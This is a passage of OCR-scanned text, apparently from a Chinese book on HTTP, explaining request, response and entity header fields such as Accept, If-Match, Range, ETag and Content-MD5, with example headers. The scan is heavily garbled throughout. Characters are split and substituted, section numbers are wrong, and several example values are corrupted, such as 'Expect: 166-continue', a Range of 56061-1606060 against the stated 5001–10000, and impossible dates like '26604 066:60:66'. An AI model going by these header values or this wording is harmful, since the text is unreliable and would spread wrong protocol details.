类 型 的 相对 优先 级 。 可 使 用 type/subtype 这 种 形式 ， 一 次 指定 多 种 媒 
体 类 型 。 

下 面 我 们 试 举 几 个 媒体 类 型 的 例子 。 
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文本 文件 


text/html, text/plain, text/css ... 


application/xhtml+xml, application/xml ... 


图 片 文 件 


image/jpeg, image/git, 1mage/png ... 


视频 文件 


video/mpeg, video/quicktime .… 
应 用 程序 使 用 的 二 进 制 文件 


application/octet-stream, application/zip ... 


比如 ， 如 果 浏览 器 不 支持 PNG 图 片 的 显示 ， 那 Accept 束 不 指定 
image/png， 而 指定 可 处 理 的 image/gif 和 image/jpeg 等 图 片 类 型 。 


右 想 给 显示 的 如 体 基 型 章 用 做 各 级， 则 使 用 q= 来 额外 表示 权重 值 


和 用 号 〈;) 进行 分 隅 。 权 重 值 q 的 范围 是 0~1 (可 精确 到 小 数 点 
后 3 位 ) ， 且 1 为 最 大 值 。 不 指定 权重 q 值 时 ， 默 认 权 重 为 q=1.0。 


原文 是 “品质 傈 数 ”。 在 RFC2616 定义 中 ， 此 处 的 q 是 指 qvalue， 即 quality 
factor。 直 译 的 话 就 是 质量 数 ， 但 经 过 综合 考虑 理解 记忆 的 便利 性 后 ， 似 乎 采用 权 
重 值 更 为 稳妥 。 一 一 译 者 注 


当 服 务 器 提供 多 种 内 容 时 ， 将 会 首先 返回 权重 值 最 蜗 的 媒体 类 型 。 








pk 





0.4.2 Accept-Charset 
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我 想 以 这 个 字条 集 
间 语 返回 的 页 面 






Accept-Charset: iso-8859-5, 
unicode-1-1;q=0.8 





ISO-8859-5 


Accept-Charset: 1Iso-8859-5，Unicode-1-1;q=0.8 





AcceptCharset 首部 字段 可 用 来 通知 服务 器 用 户 代 理 文 持 的 字符 集 及 
字符 集 的 相对 优先 顺序 。 另 外 ， 可 一 次 性 指定 多 种 字符 集 。 与 首部 字 
段 Accept 相同 的 是 可 用 权重 q 值 来 表示 相对 优先 级 。 


该 首部 字段 应 用 于 内 容 协商 机 制 的 服务 器 驱动 协商 。 








0.4.3 Accept-Encoding 








Accept-Encoding: gzip, deflate 





Accept-Encoding 首部 字段 用 来 告知 服务 器 用 户 代 理 文 持 的 内 容 编码 及 
内 容 编码 的 优先 级 顺序 。 可 一 次 性 指定 多 种 内 容 编码 。 
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下 面试 举 出 几 个 内 容 编 码 的 例子 。 
@ gzip 
由 文件 压缩 程序 gzip (GNU zip) 生成 的 编码 格式 
(RFC1952) ， 采 用 Lempel-Ziv 算法 (L277) 及 32 位 循环 见 余 
校 验 (Cyclic Redundancy Check， 通 称 CRC) 。 


e COmMmpress 


由 UNIX 文件 压缩 程序 compress 生成 的 编码 格式 ， 采 用 Lempel- 
Ziv-Welch 算法 (LZW) 。 


e deflate 


组 合 使 用 zlib 格式 (RFC1950) 及 由 deflate 压缩 算法 
CRFC1951) 生成 的 编码 格式 。 


e identity 
不 执行 压缩 或 不 会 变化 的 默认 编码 格式 


采用 权重 q 值 来 表示 相对 优先 级 ， 这 点 与 首部 字段 Accept 相同 。 为 
外 ， 也 可 使 用 星 号 〈*) 作为 通配符 ， 指 定 任意 的 编码 格式 。 





0.4.4 Accept-Language 
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Accept-Language: zh-cn,zh;q=0.7,en-us,en;d=0.3 


首部 字段 Accept-Language 用 来 告知 服务 器 用 户 代理 能 够 处 理 的 目 然 

语言 集 〈 指 中 文 或 英文 等 ) ， 以 及 目 然 语言 集 的 相对 优先 级 。 可 一 次 
指定 多 种 自然 语言 集 。 

和 Accept 首部 字段 一 样 ， 按 权重 值 q 来 表示 相对 优先 级 。 在 上 述 图 

例 中 ， 客 户 端 在 服务 器 有 中 文 版 资源 的 情况 下 ， 会 请 求 其 返回 中 文 版 
对 应 的 啊 应 ， 没 有 中 文 版 时 ， 则 请 求 返 回 英 文 版 啊 应 。 


6.4.S Authorization 
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WAWAW-Authenticate 


该 页 面 需要 HTTP 认证 ， 
杷 你 的 认证 信息 发 给 我 


GET /index.htm 





401 Unauthorized 
WNWW-Authenticate: Basic .… 服务 器 





GET /index.htm 
Authorization: Basic dWVub3NlbjpwYXNzd29y2ZA== 


Ee 
全 = 


200 OK 


Authorization: Basic dwWVub3NlbjpwYXNzd29yZA== 


首部 字段 Authorization 是 用 来 告知 服务 器 ， 用 户 代 理 的 认证 信息 (证 
书 值 〉。 通 常 ， 想 要 通过 服务 器 认证 的 用 户 代 理会 在 接收 到 返回 的 
401 状态 码 响应 后 ， 把 首部 字段 Authorization 加 入 请 求 中 。 共 用 缓存 
在 接收 到 合 有 Authorization 首部 字段 的 请 求 时 的 操作 处 理会 略 有 差 
Ho 

有 关 HTTP 访问 认证 及 Authorization 首部 字段 ， 稍 后 的 章节 还 会 详细 
说 明 。 另 外 ， 读 者 也 可 参阅 RFC2616。 


0.4.0 Expect 
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你 能 做 到 这 个 o9? 





我 只 能 做 到 100 Continve 
| 
:和 
8 
a oa 
Ey 


本 
El 





Expect: 166-continue 


客户 端 使 用 首部 字段 Expect 来 告知 服务 器 ， 期 望 出 现 的 某 种 特定 行 
为 。 因 服务 器 无 法 理解 客户 端的 期 望 作出 回应 而 发 生 错误 时 ， 会 返回 
状态 码 417 Expectation Failed。 


客户 端 可 以 利用 该 首部 字段 ， 写 明 所 期 望 的 扩展 。 虽 然 HTTP/1.1 规 
范 只 定义 了 100-continue 〈 状 态 码 100 Continue 之 意 ) 。 





等 待 状态 码 100 啊 应 的 客户 端 在 发 生 请 求 时 ， 需 要 指定 Expect:100- 
copntinue 。 


0.4.7 From 





From: info@hackr.jp 


首部 字段 From 用 来 告知 服务 器 使 用 用 户 代 理 的 用 户 的 电子 邮件 地 
址 。 通 常 ， 其 使 用 目的 就 是 为 了 显示 搜索 引擎 等 用 户 代 理 的 负责 人 的 
电子 邮件 联系 方式 。 使 用 代理 时 ， 应 尽 可 能 包含 From 首部 字段 (但 
可 能 会 因 代理 不 同 ， 将 电子 邮件 地 址 记录 在 User-Agent 首部 字段 

内 ) 。 
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6.4.8 Host 


虚拟 主机 


www.hackr.jp 





Host: www.hackr.jp 


虚拟 主机 


www.usagidesign.jp 


图 : 虚拟 主机 运行 在 同一 个 下 上 ， 因 此 使 用 首部 字段 Host 加 以 


区 分 








Host: www.hackr.jp 


首部 字段 Host 会 告知 服务 器 ， 请 求 的 资源 所 处 的 互联 网 主机 名 和 端 
口号 。Host 首部 字段 在 HTTP/1.1 规范 内 是 唯一 一 个 必须 被 包含 在 请 
求 内 的 首部 字段 。 


首部 字段 Host 和 以 单 台 服务 器 分 配 多 个 域名 的 虚拟 主机 的 工作 机 制 
有 很 密切 的 关联 ， 这 是 首部 字段 Host 必须 存在 的 意义 。 


请 求 被 发 送 至 服务 器 时 ， 请 求 中 的 主机 名 会 用 卫 地 址 直接 疹 换 解 
决 。 但 如 果 这 时 ， 相 同 的 了 地 址 下 部 闭 运 行 着 多 个 域名 ， 那 么 服务 
央 就 会 无 法 理解 究竟 是 哪个 域名 对 应 的 请 求 。 因 此 ， 就 需要 使 用 首部 
字段 Host 来 明确 指出 请 求 的 主机 名 。 知 服务 器 未 设 定 主机 名 ， 那 直 
接 发 送 一 个 空 值 即 可 。 如 下 所 示 。 


Host: 

















0.4.9 If-Match 
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If-Match 
If-Modified-Since 
If-None-Match 
If-Range 
If-Unmodified-Since 







如 果 你 能 符合 条 件 ， 我 
就 会 接受 你 的 请 求 






图 : 附带 条 件 请 求 


形 如 下 xxx 这 种 样式 的 请 求 首 部 字段 ， 部 可 称 为 条 件 请 求 。 服 务 嚣 接 
收 到 附带 条 件 的 请 求 后 ， 只 有 判断 指定 条 件 为 真 时 ， 才 会 执行 请 求 。 


GET /index.html 
If-Match: "123456" RN 


> : 
index.html ， 


实体 标记 ( ETag ) 
123456 





实体 标记 ( ETag ) 是 与 特定 资源 关联 的 
确定 值 。 资 源 更 新 后 ETag 也 会 随 之 更 新 





GET /index.htm 
If-Match: "123456" 


> 1 
Index.html  ， 


实体 标记 ( ETag ) 
567890 





412 Precondition Failed 


图 ， 只 有 当 Hf-Match 的 字段 值 跟 ETag 值 匹 配 一 致 时 ， 服 务 器 才 会 
接受 请 求 
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If-Match: "123456" 


首部 字段 下 Match， 属 附带 条 件 之 一 ， 它 会 告知 服务 器 匹配 资源 所 用 
的 实体 标记 (ETag) 值 。 这 时 的 服务 器 无 法 使 用 弱 ETag 值 。 请 参 
照 本 半 有 关 首 部 字段 ETag 的 说 明 ) 


服务 器 会 比 对 正 Match 的 字段 值 和 资源 的 ETag 值 ， 仅 当 两 者 一 臻 
时 ， 才 会 执行 请 求 。 反 之 ， 则 返回 状态 码 412 Precondition Failed 的 啊 
应 。 


还 可 以 使 用 星 号 〈*) 指定 下 Match 的 字段 值 。 针 对 这 种 情况 ， 服 务 
器 将 会 包 略 ETag 的 值 ， 只 要 资源 存在 束 处 理 请 求 。 














6.4.10 If-Modified-Since 


GET /index.htm 
If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 






因为 是 在 2004 年 4 月 
1$ 日 之 后 重新 过 的 次 
源 ， 所 以 我 可 以 接受 










服务 器 


200 OK 
Last-Modified: Sun, 29 Aug 2004 14:03:05 GMT 


GET /index.htm 
If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 


| 


客户 端 服务 器 





这 份 资源 在 2004 年 “上 月 
必 上 日 之 后 未 更 新 过 ， 所 
以 我 不 能 接受 









304 Not Modified 


图 : 如 果 在 ff-Modified-Since 字段 指定 的 日 期 时 间 后 ， 资 源 发 生 了 
更 新 ， 服 务 器 会 接受 请 求 
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If-Modified-Since: Thu, 15 Apr 26604 066:60:66 GMT 


首部 字段 全 Modified-Since， 属 附带 条 件 之 一 ， 它 会 告知 服务 器 若 I 下 
Modified-Since 字段 值 早 于 资源 的 更 新 时 间 ， 则 和 希望 能 处 理 该 请 求 。 
而 在 指定 下 Modified-Since 字段 值 的 日 期 时 间 之 后 ， 如 果 请 求 的 资源 
都 没有 过 更 新 ， 则 返回 状态 码 304 Not Modified 的 响应 。 


IfModified-Since 用 于 确认 代理 或 客户 端 拥 有 的 本 地 资源 的 有 效 性 。 


获取 资源 的 更 新 日 期 时 间 ， 可 通过 确认 首部 字段 Last-Modified 来 确 
定 。 


0.4.11 If-None-Match 






我 这 没有 Sample.html， 所 以 
可 以 处 理 你 曲 请 求 





PUT /sample.html 
If-None-Match: * 








因为 资源 不 存在 ， 所 以 对 
应 的 ETag 也 不 存在 


客户 端 服务 器 
200 OK 


图 : 只 有 在 ff-None-Match 的 字段 值 与 ETag 值 不 一 致 时 ， 可 处 理 
该 请 求 。 与 于 Match 首部 字段 的 作用 相反 


首部 字段 全 None-Match 属于 附带 条 件 之 一 。 它 和 首部 字段 下 Match 
作用 相反 。 用 于 指定 下 None-Match 字段 值 的 实体 标记 (ETag) 值 与 
请 求 资 源 的 ETag 不 一 致 时 ， 它 就 告知 服务 器 处 理 该 请 求 。 


在 GET 或 HEAD 方法 中 使 用 首部 字段 下 None-Match 可 获取 最 新 的 资 
源 。 因 此 ， 这 与 使 用 首部 字段 下 Modified-Since 时 有 些 类 似 。 





0.4.12 If-Range 
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lf-Range 字段 值 若是 跟 ETag 值 或 更 新 的 日 期 时 间 匹 配 一 致 ， 


那么 就 作为 范围 请 求 处 理 





GET /index.html 
If-Range: 123456" 
Range: bytes=5001-10000 


及 


> : 
index.htm ;! 





获取 部 分 
index.html 客户 端 


实体 标记 ( ETag ) 
123456 





206 Partial Content 
Content-Range: bytes 5001-10000/10000 
Content-Length: 5000 


若 不 一 致 ， 则 忽略 范围 请 求 ， 返 回 全 部 





GET /index.html 
If-Range: "123456" 
Range: bytes=5001-10000 


实体 标记 ( ETag ) 
567890 
ee 


ETag: "567890" 





> ' 
index.htm : 





首部 字段 下 Range 属于 附 市 条 件 之 一 。 它 告知 服务 器 耕 指 定 的 正 
Range 字段 值 (ETag 值 或 者 时 间 ) 和 请 求 资源 的 ETag 值 或 时 间 相 一 
致 时 ， 则 作为 范围 请 求 处 理 。 反 之 ， 则 返回 全 体 资 源 。 
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如 果 不 使 用 首部 字段 If-Range 则 需要 进行 两 次 处 理 


GET / 
If-Match: "123456" 412 Precondition Failed 
Range: 5001-10000 






你 更 曲 ( 部 分 》 资 源 已 经 没有 3 
保重 新 再 发 一 个 请 求 吧 





把 剩余 曲 部 分 













来 ， 怒 新 的 部 分 发 给 我 


200 OK 
GET / ETag: "567890" 


下 面 我 们 思考 一 下 不 使 用 首部 字段 Range 发 送 请 求 的 情况 。 服 务 右 
端的 资源 如 果 更 新 ， 那 客户 端 持 有 资源 中 的 一 部 分 也 会 随 之 无 效 ， 当 
然 ， 范 围 请 求 作为 前 提 是 无 效 的 。 这 时 ， 服 务 器 会 暂且 以 状态 人 码 412 
Precondition Failed 作为 啊 应 返回 ， 其 目的 是 催促 客户 端 再 次 发 送 请 
与 使 用 首部 字段 下 Range 比 起 来 ， 就 需要 花费 两 倍 的 
L 6 








0.4.13 If-Unmodified-Since 


If-Unmodified-Since: Thu，63 Jul 26012 6060:6060:606 GMT 


首部 字段 至 Unmodified-Since 和 首部 字段 全 Modified-Since 的 作用 相 
反 。 它 的 作用 的 是 告知 服务 器 ， 指 定 的 请 求 资源 只 有 在 字段 值 内 指定 
的 日 期 时 间 之 后 ， 未 发 生 更 新 的 情况 下 ， 才 能 处 理 请 求 。 如 果 在 指定 
日 期 时 间 后 发 生 了 更 新 ， 则 以 状态 码 412 Precondition Failed 作为 啊 应 
返回 。 





0.4.14 Max-Forwards 
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只 能 再 往 下 


Max-Forwards: 2 Max-Forwards: 1 Max-Forwards: 0 





代理 服务 器 A 代理 服务 器 B 


图 : 每 次 转发 数值 减 1。 当 数值 变 0 时 返回 响应 





Max-Forwards: 16 


通过 TRACE 方法 或 OPTIONS 方法 ， 发 送 包含 首部 字段 Max- 
Forwards 的 请 求 时 ， 该 字段 以 十 进 制 整数 形式 指定 可 经 过 的 服务 器 最 
大 数目 。 服 务 器 在 往 下 一 个 服务 器 转发 请 求 之 前 ，Max-Forwards 的 
值 减 1 后 重新 赋值 。 当 服务 器 接收 到 Max-Forwards 值 为 0 的 请 求 

时 ， 则 不 再 进行 转发 ， 而 是 直接 返回 啊 应 。 


使 用 HTTP 协议 通信 时 ， 请 求 可 能 会 经过 代理 等 多 台 服 务 器 。 途 中 ， 
如 果 代 理 服 务 器 由 于 某 些 原因 导致 请 求 转发 失败 ， 客 户 病 也 就 等 不 到 
服务 器 返回 的 响应 了 。 对 此 ， 我 们 无 从 可 知 。 


可 以 灵活 使 用 首部 字段 Max-Forwards， 针 对 以 上 问题 产生 的 原因 展 
开 调 查 。 由 于 当 Max-Forwards 字段 值 为 0 时， 服务 器 就 会 立即 返回 
啊 应 ， 由 此 我 们 至 少 可 以 对 以 那 台 服务 器 为 终点 的 传输 路 径 的 通信 状 
况 有 所 把 握 。 





怎么 不 见 响 应 





代理 服务 器 A 代理 服务 器 B 源 服 务 器 


客户 端 
图 : 代理 了 到 源 服 务 器 的 请 求 失败 了 ， 但 客户 问 不 知道 








112 






怎么 不 见 响 应 
返回 呢 …… 






( 信 RE 
WU rr pA 
i \ 入 PYG 
ih 
[1 SC 


”陷入 循环 


[4 
和 


图 : 由 于 未 知 原因 ， 导 致 请 求 陷 入 代理 之 间 的 循环 ， 但 客户 端 不 
知道 


60.4.1S Proxy-Authorization 


Proxy-Authorization: Basic dGlwOjkpNLAGfFY5 


接收 到 从 代理 服务 器 发 来 的 认证 质询 时 ， 客 户 端 会 发 送 包 含 首 部 字段 
Proxy-Authorization 的 请 求 ， 以 告知 服务 器 认证 所 需要 的 信息 。 


这 个 行为 是 与 客户 端 和 服务 器 之 间 的 HITP 访问 认证 相 类 似 的 ， 不 同 
之 处 在 于 ， 认 证 行为 发 生 在 客户 端 与 代理 之 间 。 客 户 端 与 服务 器 之 间 
的 认证 ， 使 用 首部 字段 Authorization 可 起 到 相同 作用 。 有 关 HTTP 访 
问 认 证 ， 后 面 的 章节 会 作 详尽 阐述 。 








0.4.16 Range 


Range: bytes=56061-1606060 


对 于 只 逢 获取 部 分 资源 的 范围 请 求 ， 包含 首部 字段 Range 即 可 告知 服 
务 髓 资源 的 指定 范围 。 上 面 的 示例 表示 请 求 获取 从 第 5001 字 节 至 第 
10000 字 节 的 资源 。 


接收 到 附带 Range 首部 字段 请 求 的 服务 器 ， 会 在 处 理 请 求 之 后 返回 状 
态 码 为 206 Partial Content 的 啊 应 。 无 法 处 理 该 范围 请 求 时 ， 则 会 返 
回 状态 码 200 OK 的 响应 及 全 部 资源 。 
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0.4.17 Referer 





4 a 
GET / 只 要 查看 Referer 就 能 知道 请 求 的 
Referer: http://www.hackr.jp/index.htm URI 是 从 哪个 Web 页 面 发 起 的 







这 个 请 求 的 URI 星 从 
我 这 里 发 起 由 








Referer: http://www.hackr.jp/index.htm 
首部 字段 Referer 会 告知 服务 器 请 求 的 原始 资源 的 URI。 


客户 疹 一 般 都 会 发 送 Referer 首部 字段 给 服务 器 。 但 当下 接 在 浏览 天 
Bae URI， 或 出 于 安全 性 的 考虑 时 ， 也 可 以 不 发 送 该 首部 字 
Xo 


因为 原始 资源 的 URI 中 的 查询 字符 串 可 能 含有 ID 和 密码 等 保密 信 
恩 ， 要 是 写 进 Referer 转发 给 其 他 服务 器 ， 则 有 可 能 导致 保密 信息 的 
进 露 。 


另外 ，Referer 的 正确 的 拼写 应 该 是 Referrer， 但 不 知 为 何 ， 大 家 一 直 
沿用 这 个 错误 的 拼写 。 








0.4.18 TE 


TE: gzip，def]late;q=6.5 


首部 字段 TE 会 告知 服务 喜 客 户 端 能 够 处 理 啊 应 的 传输 编码 方式 及 相 
0 
俞 编码 。 


首部 字段 TE 除 指定 传输 编码 之 外 ， 还 可 以 指定 伴随 trailer 字段 的 分 
块 传输 编码 的 方式 。 应 用 后 者 时 ， 只 需 把 trailers 赋值 给 该 字段 值 。 





TE: trailers 


114 


0.4.189 User-Agent 





TD To] 


hackrap 


DC HA Ohackip 女 @^ 


hackr 





Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like 
Mac OS X) AppleWebKit/534.46 (KHTML, like 
Gecko) Version/5.1 Mobile/9A334 








图 : User-Agent 用 于 传达 浏览 器 的 种 类 


User-Agent: Mozilla/5.60 (Windows NT 6.1; WOW64; rv:13.0) Ged 





首部 字段 User-Agent 会 将 创建 请 求 的 浏览 器 和 用 户 代 理 名 称 等 信息 传 
达 给 服务 器 。 


由 网 络 候 虫 发 起 请 求 时 ， 有 可 能 会 在 字段 内 添加 和 候 虫 作者 的 电子 邮件 
如 果 请 求 经 过 代理 ， 那 么 中 间 也 很 可 能 被 添加 上 代理 服 
器 的 名 称 


6.S 啊 应 首部 字段 


啊 应 首部 字段 是 由 服务 器 端 加 客户 靖 返回 啊 应 报 文中 所 使 用 的 字段 ， 
用 于 补充 啊 应 的 附加 信息 、 服 务 器 信息 ， 以 及 对 客 尸 端的 附加 要求 等 


主 息 ， 


吾 心 \ 
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我 把 响应 发 送 过 来 





图 : HTTP 啊 应 报 文中 使 用 的 首部 字段 


0.S.1 Accept-Ranges 


范围 请 求 Ok 鸣 
Accept-Ranges: bytes 





客户 端 


图 : 当 不 能 处 理 范 围 请 求 时 ，Accept-Ranges: none 


Accept-Ranges: bytes 


首部 字段 Accept-Ranges 是 用 来 告知 客户 端 服务 器 是 否 能 处 理 范围 请 
求 ， 以 指定 获取 服务 器 端 某 个 部 分 的 资源 。 


可 指定 的 字段 值 有 两 种 ， 可 处 理 范 围 请 求 时 指定 其 为 bytes， 反 之 则 
指定 其 为 none。 


0.S.2 Age 
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缓存 服务 器 源 服务 器 


Age: 666 


首部 字段 Age 能 告知 客户 端 ， 源 服务 器 在 多 和 久 前 创建 了 啊 应 。 字 段 值 
的 单位 为 秒 。 


各 创建 该 啊 应 的 服务 需 是 缓存 服务 器 ，Asge 值 是 指 缓存 后 的 啊 应 再 次 
发 起 认证 到 认证 完成 的 时 间 值 。 代 理 创建 响应 时 必须 加 上 首部 字段 
Age。 





0.S.3 ETag 


> 
index.htm 


ETag: usagi-1234 










资源 更 新 


> 
index.htm 


ETag: usagi-5678 


ETag: "82e22293987ce725faf67773957acd12" 


首部 字段 ETag 能 告知 客户 并 实体 标识 。 它 是 一 种 可 将 资源 以 字符 串 
008060 0 00 0 oe 
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另外 ， 当 资源 更 新 时 ，ETag 值 也 需要 更 新 。 生 成 ETag 值 时 ， 并 没有 
统一 的 算法 规则 ， 而 仅仅 是 由 服务 器 来 分 配 。 













资源 曲 URI 虽然 相同 ， 但 
中 文 版 和 英文 版 对 应 曲 次 
际 是 不 同 巾 
英文 版 


Google Google 





[ 


ms Tv Google Stunch 








ETag: usagi-abcd ETag: usagi-efgh 


资源 被 缓存 时 ， 融 会 被 分 配 唯 一 性 标识 。 例 如 ， 当 使 用 中 文 版 的 浏览 
器 访问 http:/www.google.comy/ 时 ， 就 会 返回 中 文 版 对 应 的 资源 ， 而 
使 用 英文 版 的 浏览 器 访问 时 ， 则 会 返回 英文 版 对 应 的 资源 。 两 者 的 
URI 是 相同 的 ， 所 以 仅 赁 URI 指定 缓存 的 资源 是 相当 困难 的 。 若 在 下 
载 过 程 中 出 现 连接 中 断 、 再 连接 的 情况 ， 都 会 依照 ETag 值 来 指定 资 
强 ETag 值 和 弱 Tag 值 

ETag 中 有 强 ETag 值 和 弱 Elag 值 之 分 。 

强 ETag 值 

强 ETag 值 ， 不 论 实体 发 生 多 么 细微 的 变化 都 会 改变 其 值 。 

弱 ETag 值 


弱 ETag 值 只 用 于 提示 资源 是 售 相 同 。 只 有 资源 发 生 了 根本 改变 ， 产 
生 差 异 时 才 会 改变 ETag 值 。 这 时 ， 会 在 字段 值 最 开始 处 附加 W/。 


ETag: W/"uvusagi-1234" 


6.5.4 Location 
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你 要 浏览 网 页 面 已 对 
转移 ， Ce 






GET /sample.htm 


服务 器 A 


www.hackr.jp 


. 302 Found 
那 我 到 那里 去 看 Location: http://www.usagidesign.jp/sample.htm 





GET /sample.htm 





200 OK 服务 器 B 
www.usagidesign.jp 


Location: http://www.usagidesign.jp/sample.html 


使 用 首部 字段 Location 可 以 将 啊 应 接收 方 引导 至 茶 个 与 请 求 URI 位 置 
不 同 的 资源 。 


基本 上 ， 该 字段 会 配合 3xx : Redirection 的 啊 应 ， 提 供 重 定 问 的 
URI。 


几乎 所 有 的 浏览 器 在 接收 到 包 合 首部 字段 Location 的 啊 应 后 ， 都 会 强 
制 性 地 尝试 对 已 提示 的 重 定 癌 资源 的 访问 。 








0.S.S Proxy-Authenticate 





Proxy-Authenticate: Basic realm="Usagidesign Auth" 
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首部 字段 Proxy-Authenticate 会 把 由 代理 服务 器 所 要 求 的 认证 信息 发 送 
给 客户 端 。 


它 与 客户 端 和 服务 器 之 间 的 HTTP 访问 认证 的 行为 相似 ， 不 同 之 处 在 
于 其 认证 行为 是 在 客户 端 与 代理 之 间 进 行 的 。 而 客户 端 与 服务 器 之 间 
进行 认证 时 ， 首 部 字段 WWW-Authorization 有 着 相同 的 作用 。 有 关 
HTTP 访问 认证 ， 后 面 的 章节 会 再 进行 详尽 阐述 。 











0.S.0 Retry-After 


5 分 种 后 


再 来 访问 哦 





Retry-After : 126 


首部 字段 Retry-After 告知 客户 端 应 该 在 多 久之 后 再 次 发 送 请 求 。 主 要 
配合 状态 码 503 Service Unavailable 响应 ， 或 3xx Redirect 响应 一 起 使 
用 。 


字段 值 可 以 指定 为 具体 的 日 期 时 间 (Wed, 04 Jul 2012 06: 34: 24 
GMT 等 格式 ) ， 也 可 以 是 创建 响应 后 的 秒 数 。 





0.$.7 Server 
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Server: Apache/2.2.17 (Unix) 


首部 字段 Server 告知 客户 器 当前 服务 器 上 安装 的 HTTP 服务 器 应 用 程 
序 的 信息 。 不 单单 会 标 出 服务 器 上 的 软件 应 用 名 称 ， 还 有 可 能 包括 版 
本 号 和 安装 时 局 用 的 可 选项 。 


Server: Apache/2.2.6 (Unix) PHP/5.2.5 





0.S.8 Vary 
GET /sample.html GET /sample.html 
Accept-Language: en-us Accept-Language: en-us 





只 能 对 持 相 同 自然 语言 
( Accept-Langua9e ) 网 请 求 返 回 
缓存 







图 : 当代 理 服务 器 接收 到 带 有 Vary 首部 字段 指定 获取 资源 的 请 求 
时 ， 如 果 使 用 的 Accept-Language 字段 的 值 相同 ， 那 么 就 直接 从 组 
存 返 回 啊 应 。 反 之 ， 则 需要 先 从 源 服务 器 端 获 取 资 源 后 才能 作为 
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啊 应 返回 


Vary: Accept-Language 


首部 字段 Vary 可 对 绥 存 进行 控制 。 源 服务 占 会 同 代理 服务 器 传达 关 
于 本 地 缓存 使 用 方法 的 命令 。 


从 代理 服务 需 接 收 到 源 服 务 器 返回 包含 Vary 指定 项 的 啊 应 之 后 ， 知 
再 要 进行 缓存 ， 仅 对 请 求 中 含有 相同 Vary 指定 首部 字段 的 请 求 返 回 
绥 存 。 即 使 对 相同 资源 发 起 请 求 ， 但 由 于 Vary 指定 的 首部 字段 不 相 
同 ， 因 此 必须 要 从 源 服务 器 重新 获取 资源 。 











6.5.9 WWW-Authenticate 


WWW-Authenticate: Basic realm="Usagidesign Auth" 





首部 字段 WWW-Authenticate 用 于 HTTP 访问 认证 。 它 会 告知 客户 端 
适用 于 访问 请 求 URI 所 指定 资源 的 认证 方案 (Basic 或 是 Digest) 和 
高 参 数 提示 的 质询 (challenge )。 状 态 码 401 Unauthorized 啊 应 中 ， 
肯定 带 有 首部 字段 WWW-Authenticate。 


上 述 示例 中 ，realm 字段 的 字符 串 是 为 了 辨别 请 求 URI 指定 资源 所 受 
到 的 保护 策略 。 有 关 该 首部 ， 请 参阅 本 章 之 后 的 内 容 。 


6.6 ”实体 首部 字段 


实体 首部 字段 是 包含 在 请 求 报 文 和 响应 报 文中 的 实体 部 分 所 使 用 的 首 
部 ， 用 于 补充 内 容 的 更 新 时 间 等 与 实体 相关 的 信息 。 











> 


pi 


图 : 在 请 求 和 响应 两 方 的 HTTP 报 文中 都 含有 与 实体 相关 的 首部 





客户 端 
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字段 


0.0.1 Allow 








在 我 这 边 只 能 使 用 GET 
攻 g HEAD 方法 吐 


es 


Allow: GET, HEAD 





客户 端 








Allow: GET, HEAD 


首部 字段 Allow 用 于 通知 客户 端 能 够 支持 Request-URI 指定 资源 的 所 
有 HTTP 方法 。 当 服务 器 接收 到 不 支持 的 HTTP 方法 时 ， 会 以 状态 码 
405 Method Not Allowed 作为 响应 返回 。 与 此 同时 ， 还 会 把 所 有 能 文 

持 的 HTTP 方法 写 入 首部 字段 Allow 后 返回 。 


0.0.2 ” Content-Encoding 








Content-Encoding: gzip 


首部 字段 Content-Encoding 会 告知 客户 端 服务 器 对 实体 的 主体 部 分 选 
容 编码 方式 。 内 容 编码 是 指 在 不 丢失 实体 信息 的 前 提 下 所 进行 
压缩。 















我 已 控 这 种 方式 进行 了 压缩， 
之 后 提 解 压 工 作 就 竺 托 你 了 


主要 采用 以 下 4 种 内 容 编码 的 方式 。“〈 各 方式 的 说 明 请 参考 6.4.3 节 
Accept-Encoding 首部 字段 ) 。 


@ gzip 
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e compress 
e deflate 


。 identity 


0.0.3 Content-Language 





Content-Language: zh-CN 





首部 字段 Content-Language 会 告知 客户 端 ， 实 体 主 体 使 用 的 自然 语言 
〈 指 中 文 或 英文 等 语言 ) 。 


0.0.4 Content-Length 






该 资源 拘 大 小 为 !50oo 字 节 





Content-Length: 15666 


首部 字段 Content-Length 表明 了 实体 主体 部 分 的 大 小 〈 单 位 是 字 

节 ) 。 对 实体 主体 进行 内 容 编码 传输 时 ， 不 能 再 使 用 Content-Length 
首部 字段 。 由 于 实体 主体 大 小 的 计算 方法 略微 复杂 ， 所 以 在 此 不 再 展 
开 。 读 者 若 想 一 探究 葛 ， 可 参考 RFC2616 的 4.4。 


0.0.$ Content-Location 


124 





Content-Location: http://www.hackr.jp/index-ja.html 


首部 字段 Content-Location 给 出 与 报 文 主体 部 分 相对 应 的 URI。 和 首 
部 字段 Location 不 同 ，Content-Location 表示 的 是 报 文 主体 返回 资源 对 
应 的 URI。 


比如 ， 对 于 使 用 首部 字段 Accept-Language 的 服务 器 驱动 型 请 求 ， 当 
返回 的 页 面 内 容 与 实际 请 求 的 对 象 不 同时 ， 首 部 字段 Content-Location 
内 会 写 明 URI。 (访问 http:/www.hackr.jp/ 返回 的 对 象 却 是 
http://www.hackr.jp/index-ja.html 等 类 似 情 况 ) 











6.6.6 Content-MDS 


Base64 编码 


Content-MDS: 
OGFKZDUWNGVINNGY 3N2MxMD 
Iw2Zme@4NTBmY2IYTY== 


人 = 


图 : 客户 端 会 对 接收 的 报 文 主体 执行 相同 的 MDS 算法 ， 然 后 与 首 
部 字段 Content-MDS 的 字段 值 比较 


Content-MD5: 0OGFKZDUwNGVhNGY3N2MXMDIWZmQ4NTBmY2IyTY== 


首部 字段 ContenrMD5 是 一 串 由 MD5 算法 生成 的 值 ， 其 目的 在 于 检 
查 报 文 主体 在 传输 过 程 中 是 否 保持 完整 ， 以 及 确认 传输 到 达 。 


对 报 文 主体 执行 MD5 算法 获得 的 128 位 二 进 制 数 ， 再 通过 Base64 编 
码 后 将 结果 写 入 Content-MD5 字段 值 。 由 于 HTTP 首部 无 法 记录 二 进 
制 值 ， 所 以 要 通过 Base64 编码 处 理 。 为 确保 报 文 的 有 效 性 ， 作 为 接 
收 方 的 客户 端 会 对 报 文 主体 再 执行 一 次 相同 的 MD5 算法 。 计 算出 的 
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值 与 字段 值 作 比较 后 ， 即 可 判断 出 报 文 主体 的 准确 性 。 


采用 这 种 方法 ， 对 内 容 上 的 偶发 性 改变 是 无 从 碍 证 的 ， 也 无 法 检测 出 
恶意 修改 。 其 中 一 个 原因 在 于 ， 内 容 如 果 能 够 被 复 改 ， 那 么 同时 意味 
